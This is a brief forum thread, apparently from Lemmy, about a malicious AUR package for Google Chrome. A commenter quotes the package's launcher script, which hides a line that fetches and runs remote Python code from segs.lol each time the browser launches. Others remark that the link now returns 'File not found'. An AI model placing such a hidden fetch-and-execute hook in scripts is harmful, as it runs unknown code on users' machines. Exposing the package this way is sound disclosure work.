196 @lemmy.blahaj.zone irelephant [he/him] @lemmy.dbzer0.com 5d ago AUR rule aur.archlinux.org google-chrome-stable.sh - aur.git - AUR Package Repositories curl segs.lol
Weird, it's coming up for me: shell #!/bin/bash XDG_CONFIG_HOME=${XDG_CONFIG_HOME:-~/.config} # Allow users to override command-line options if [[ -f $XDG_CONFIG_HOME/chrome-flags.conf ]]; then CHROME_USER_FLAGS="$(grep -v '^#' $XDG_CONFIG_HOME/chrome-flags.conf)" fi # Launch python -c "$(curl https://segs.lol/9wUb1Z)" exec /opt/google/chrome/google-chrome $CHROME_USER_FLAGS "$@"
File not found :(
Weird, it's coming up for me:
I think they meant opening https://segs.lol/9wUb1Z returns a
File not found
error.